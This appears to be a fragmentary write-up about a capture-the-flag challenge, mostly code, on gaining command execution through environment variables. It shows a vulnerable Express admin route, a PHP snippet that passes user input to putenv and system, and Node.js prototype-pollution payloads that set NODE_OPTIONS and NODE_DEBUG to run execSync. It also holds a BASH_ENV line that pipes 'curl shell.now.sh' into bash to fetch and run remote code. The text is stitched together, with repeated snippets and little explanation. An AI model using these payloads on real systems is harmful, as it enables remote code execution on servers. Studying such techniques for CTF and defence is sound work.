由一篇文章和一道题目引发的对于环境变量的探索
// prototype pollution
app.get('/admin',(req,res)=>{
if(manage.get(object,'username','guest') === 'admin'){
console.log('Current User:'+object.username)
const child = proc.fork(`${__dirname}/public/user.js`,['admin']);
child.on('message', (body) => {
res.status(200).send(body);
});
child.on('close', (code, signal) => {
console.log(`subproccess ended with ${signal}`);
});
}else{
res.status(403).send('Only Admin Can View this');
}
})if (isset($_GET['p'])) { foreach ($_GET['p'] as $p) { putenv($p); } }
if (file_exists($_GET['file'])) {
var_dump(escapeshellarg($_GET['file']) . " 2>&1");
system(escapeshellarg($_GET['file']) . " 2>&1");
}/bin/bash -c 'ls' 不好
BASH_ENV=`curl shell.now.sh | bash` /bin/bash 好
// prototype pollution
app.get('/admin',(req,res)=>{
if(manage.get(object,'username','guest') === 'admin'){
console.log('Current User:'+object.username)
const child = proc.fork(`${__dirname}/public/user.js`,['admin']);
child.on('message', (body) => {
res.status(200).send(body);
});
child.on('close', (code, signal) => {
console.log(`subproccess ended with ${signal}`);
});
}else{
res.status(403).send('Only Admin Can View this');
}
})const child_process = require('child_process');
Object.prototype.env = {
NODE_DEBUG : '1; throw require("child_process").execSync("sleep 7").toString()//',
NODE_OPTIONS : '-r /proc/self/environ'
};
child_process.execSync('node');Step1: child_process.js
Step2: spawn_sync.cc & another
Step3: libuv/src/unix/process.c & another
Step4: NodeJS cli
const child_process = require('child_process');
Object.prototype.shell = "node";
Object.prototype.env = {
NODE_DEBUG : '1; throw require("child_process").execSync("sleep 7").toString()//',
NODE_OPTIONS : '-r /proc/self/environ'
};
child_process.execSync('id');About 'shell' here
With prototype pollution
We can almost do anything!